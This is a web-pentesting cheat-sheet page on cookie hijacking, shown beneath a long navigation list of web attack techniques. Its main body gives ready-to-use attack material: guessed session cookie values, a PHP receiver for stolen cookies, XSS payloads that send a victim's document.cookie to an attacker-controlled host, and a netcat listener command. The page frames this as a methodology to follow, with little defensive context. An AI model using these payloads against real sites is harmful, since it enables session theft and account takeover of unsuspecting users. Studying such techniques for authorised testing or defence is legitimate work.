Method

Bypass Client/Server Side Filter

HTTP Rate Limit Bypass

Virtual Hosts (VHOSTS) Enumeration

WAF (Web Application Firewall) Detection

Web Basic Pentesting

Web Content Discovery

Web Login Bypass

Web Registration (Signup) Attack

Web Server Security Misconfiguration

Security Risk

Blind XXE

Broken Access Control

Business Logic Attack

CORS (Cross-Origin Resource Sharing) Attack

CRLF (Carriage Return Line Feed) Injection

CSRF (Cross-Site Request Forgery)

Client-Side JavaScript Validation Bypass

DOM Cloberring

Directory (Path) Traversal

ERB SSTI

File Inclusion (LFI/RFI)

File Upload Attack

File Upload Attack on Exiftool

File Upload Attack on ImageMagick

HTTP Header Injection

HTTP Request Smuggling

Host Header Attack

IDOR (Insecure Direct Object References) Attack

Insecure Deserialization

JSON.NET Deserialization

LaTeX Injection

NoSQL Injection

Node.js Deserialization Attack

OAuth Attack

OS Command Injection

Open Redirect

PHP Filters Chain

PHP Object Injection

Prototype Pollution in Client-Side

Prototype Pollution in Server-Side

Redis SSRF

SQL Injection

SQL Injection Cheat Sheet

SQL Injection with Sqlmap

SSRF (Server-Side Request Forgery)

SSTI (Server-Side Template Injection)

Web Cache Deception

Web Cache Poisoning

Web Race Condition Attack

XSS (Cross-Site Scripting)

XSS with Dynamic PDF

XST (Cross-Site Tracing)

XXE (XML External Entity)

wkhtmltopdf SSRF

Cookie

Cookie Hijacking

Session Fixation

Cookie Hijacking

Last modified: 2023-04-21

A methodology of manipulating, grabbing cookies.

Cookie: PHPSESSID=0
Cookie: PHPSESSID=1
Cookie: PHPSESSID=999

<!-- ASCII Hex -->
Cookie: PHPSESSID=3836382d61646d696e

In your local machine, create the payload for grabbing the cookie when the other user will access your machine.

// steal_cookie.php

<?php echo $_GET['cookie']; ?>

Create the JavaScript code to force users to access your machine which shows the victim's cookie value.

<script>document.location = 'http://<attacker-ip>:4444/steal_cookie.php?cookie='+document.cookie</script>

POST request with this JavaScript code to the target web page.
Open listner in your local machine and wait for the other users will access the target web page.

nc -lvnp 4444

This script is useful to steal Cookie.
To start web server, execute the Python script as below.

python2 XSS-cookie-stealer.py

Then inject our XSS to steal Cookie via our web server.
For instance,

<img src=x onerror=this.src='http://10.0.0.1:8888/?'+document.cookie;>

References

https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md

Method

Security Risk

Cookie

CMS

Framework

Template Engine

API

Cloud

Microsoft

Tool

Others

Cookie Hijacking

Cookie Manipulation

PHP Cookie Grabbing with XSS

Python Cookie Stealer with XSS

References

ON THIS PAGE